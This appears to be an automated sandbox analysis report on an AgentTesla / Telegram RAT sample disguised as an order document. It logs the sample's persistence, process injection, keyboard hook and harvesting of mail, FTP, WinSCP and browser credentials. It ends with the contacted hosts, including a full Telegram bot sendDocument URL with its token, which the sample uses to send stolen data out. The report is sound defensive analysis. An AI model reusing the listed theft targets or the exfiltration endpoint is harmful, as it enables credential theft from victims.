Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Queries volume information: C:\Users\user\AppData\Roaming\WsdnBq.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Queries volume information: C:\Users\user\AppData\Roaming\WsdnBq.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Telegram RAT
Source: Yara match File source: Process Memory Space: ORDER (6256 OS)#391 PI.exe PID: 1948, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: WsdnBq.exe PID: 1328, type: MEMORYSTR
Yara detected AgentTesla
Source: Yara match File source: 00000004.00000002.565934222.0000000002C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.566251641.00000000032BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ORDER (6256 OS)#391 PI.exe PID: 1948, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: WsdnBq.exe PID: 1328, type: MEMORYSTR
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\ Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: ORDER (6256 OS)#391 PI.exe PID: 1948, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: WsdnBq.exe PID: 1328, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Telegram RAT
Source: Yara match File source: Process Memory Space: ORDER (6256 OS)#391 PI.exe PID: 1948, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: WsdnBq.exe PID: 1328, type: MEMORYSTR
Yara detected AgentTesla
Source: Yara match File source: 00000004.00000002.565934222.0000000002C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.566251641.00000000032BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ORDER (6256 OS)#391 PI.exe PID: 1948, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: WsdnBq.exe PID: 1328, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 764027 Sample: ORDER (6256 OS)#391 PI.exe Startdate: 09/12/2022 Architecture: WINDOWS Score: 100 45 Snort IDS alert for network traffic 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 Sigma detected: Scheduled temp file as task from temp location 2->49 51 14 other signatures 2->51 7 WsdnBq.exe 5 2->7         started        10 ORDER (6256 OS)#391 PI.exe 6 2->10         started        process3 file4 53 Multi AV Scanner detection for dropped file 7->53 55 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 7->55 57 May check the online IP address of the machine 7->57 61 2 other signatures 7->61 13 WsdnBq.exe 14 3 7->13         started        17 schtasks.exe 1 7->17         started        29 C:\Users\user\AppData\Roaming\WsdnBq.exe, PE32 10->29 dropped 31 C:\Users\user\AppData\Local\...\tmpF47D.tmp, XML 10->31 dropped 33 C:\Users\...\ORDER (6256 OS)#391 PI.exe.log, ASCII 10->33 dropped 59 Injects a PE file into a foreign processes 10->59 19 ORDER (6256 OS)#391 PI.exe 15 3 10->19         started        21 schtasks.exe 1 10->21         started        23 ORDER (6256 OS)#391 PI.exe 10->23         started        signatures5 process6 dnsIp7 35 54.91.59.199, 443, 49697 AMAZON-AESUS United States 13->35 37 api.ipify.org 13->37 63 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 13->63 65 Tries to steal Mail credentials (via file / registry access) 13->65 67 Tries to harvest and steal ftp login credentials 13->67 69 Tries to harvest and steal browser information (history, passwords, etc) 13->69 25 conhost.exe 17->25         started        39 api.telegram.org 149.154.167.220, 443, 49696, 49698 TELEGRAMRU United Kingdom 19->39 41 api.ipify.org.herokudns.com 3.232.242.170, 443, 49695 AMAZON-AESUS United States 19->41 43 2 other IPs or domains 19->43 71 Installs a global keyboard hook 19->71 27 conhost.exe 21->27         started        signatures8 process9
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU false
54.91.59.199
 unknown United States
14618 AMAZON-AESUS false
3.232.242.170
 api.ipify.org.herokudns.com United States
14618 AMAZON-AESUS false

Private

IP
192.168.2.1

Contacted Domains

Name IP Active
api.ipify.org.herokudns.com 3.232.242.170 true
api.telegram.org 149.154.167.220 true
api.ipify.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.telegram.org/bot5962712783:AAFVWYP7zptQlynX_9COtuxYcx3Dl7EnfUQ/sendDocument false
    		high
    https://api.ipify.org/ false
      		high